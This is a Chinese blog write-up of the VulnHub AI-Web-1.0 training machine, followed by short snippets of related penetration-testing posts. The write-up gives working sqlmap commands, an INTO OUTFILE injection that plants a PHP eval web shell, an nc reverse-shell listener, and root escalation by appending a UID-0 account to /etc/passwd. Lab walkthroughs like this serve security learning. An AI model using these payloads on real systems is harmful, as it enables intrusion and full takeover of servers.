代码编织梦想

  1. 首先使用nmap探测端口开放情况,只开放了80端口 
  2. 使用disearch探测目录,看下robots.txt内容

  3. 找到两个禁止访问的目录,丢到dirsearch扫到phpinfo,另外一个存在SQL注入的地方

 

 

4.se3reTdir777存在注入,但是最后的账号密码是假的,没任何用处,但是结合phpinfo泄露的网站绝对路径,可以尝试osshell或者outfile个文件

python sqlmap.py -u "http://192.168.234.148/se3reTdir777/" --data="uid=1&Operation=Submit" --level=3 --dbs

 

5.尝试outfile,选择在uploads目录下才有写入权限

-1' union select 1,2,'<?php @eval($_POST[123]);?>' into outfile "/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/a.php"#

6.尝试使用--os-shell

python sqlmap.py -u "http://192.168.234.148/se3reTdir777/" --data="uid=1&Operation=Submit" --os-shell

写入交互shell,使用kali linux nc -nlvp 1234

Python Sqlmap.py -u "http://192.168.234.148/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write ./hack.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php

7.提权

先使用python转换为交互式shell

python -c 'import pty;pty.spawn("/bin/bash")

因为www-data对/etc/passwd有操作权限,所以可以生成一条标识号为0的账号进去

openssl passwd -1 -salt test test  $1$test$pi/xDtU5WFVRqYS6BMU8X/

然后模仿/etc/passwd写进去  echo ‘test:$1$test$pi/xDtU5WFVRqYS6BMU8X/

:0:0::/root:/bin/bash’>>/etc/passwd

最后在切换test用户,su test

成功拿到root权限

 

读取/root/flag.txt

 

 

 

 

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73054601/article/details/128885582

vulnhub靶机AI-Web-1.0渗透笔记-爱代码爱编程

靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机:AI-Web1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-1,353/ 渗透过程 1.信息收集 1.1 主机发现 netdiscover 使用这条命令来确认目标靶机IP地址 确认目标靶机IP地址:1

vulnhub靶机 Os-hackNos-1-爱代码爱编程

vulnhub靶机 Os-hackNos-1 靶机下载 https://www.vulnhub.com/entry/hacknos-os-hacknos,401 目标为 普通用户的user.txt和root用户的root.txt 靶机配置 在将靶机文件下载下来为Os-hackNos-1.ova 使用vm打开这个ova文件进行导入。导入完成后,若是

一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》-爱代码爱编程

随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。   一、网络安全行业

Vulnhub靶机:AI-Web-1.0-爱代码爱编程

1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用

Vulnhub靶机渗透测试——DC-3-爱代码爱编程

一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu16.04): 192.168.189.182 靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/ 二、信息收集 1、使用nmap扫描存活主机 2、发现IP192.168.189.182开放80端口,再对其进行n

看完这篇 教你玩转渗透测试靶机vulnhub——Ai-Web1-爱代码爱编程

Vulnhub靶机Web1渗透测试详解 Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:SQL注入:③:文件上传:④:反弹shell:⑤:提权:⑥:获取flag:Vulnhub靶机渗透总结: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多

VulnHub靶机 - AI:Web 2.0-爱代码爱编程

靶机简介: 这是AI:Web系列的第二个方框,您将有更多的乐趣来应对这一挑战。目标很简单。从/root/flag.txt获取标志。枚举该框,获取低特权的shell,然后将特权提升为root。 You may need to crack password. Use wordlist SecLists/rockyou-45.txt by Mr. Danie

vulnhub靶机之me-and-my-girlfriend-1_夜入吴的博客-爱代码爱编程

第一次发文章,这是vulnhub的一个靶机,我是通过在B站上一个老师的视频学习,然后写的这篇文章,也是作为自己的一个学习记录,来对自己的学习进行一个巩固,老师的链接https://www.bilibili.com/video/BV1264y147Ws?spm_id_from=333.999.0.0,大家也可以去看老师的视频,老师讲的真的很好。下面就开始这次

vulnhub 靶机dc-1_lee_yc的博客-爱代码爱编程

1、扫描局域网中的IP地址,确定靶机ip Arp-scan -l 2、确定靶机IP后扫描靶机开放的端口 nmap -sV -p- 192.168.50.138 发现扫描到四个开放的端口80、42458、111、22 3、直接先访问80端口,是一个登录界面就不需要扫描网站目录来找登陆界面了 4、这时候想办法查看该网站的

vulnhub靶机练习-os-hacknos-1_夜yesir的博客-爱代码爱编程

靶机描述 难度容易到中 flag 两个 一个是普通用户的user.txt 另外一个是root用户的user.txt Difficulty : Easy to Intermediate Flag : 2 Flag first user And second root Learning : exploit | Web Application | Enu

vulnhub靶机渗透测试——dc-爱代码爱编程

Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机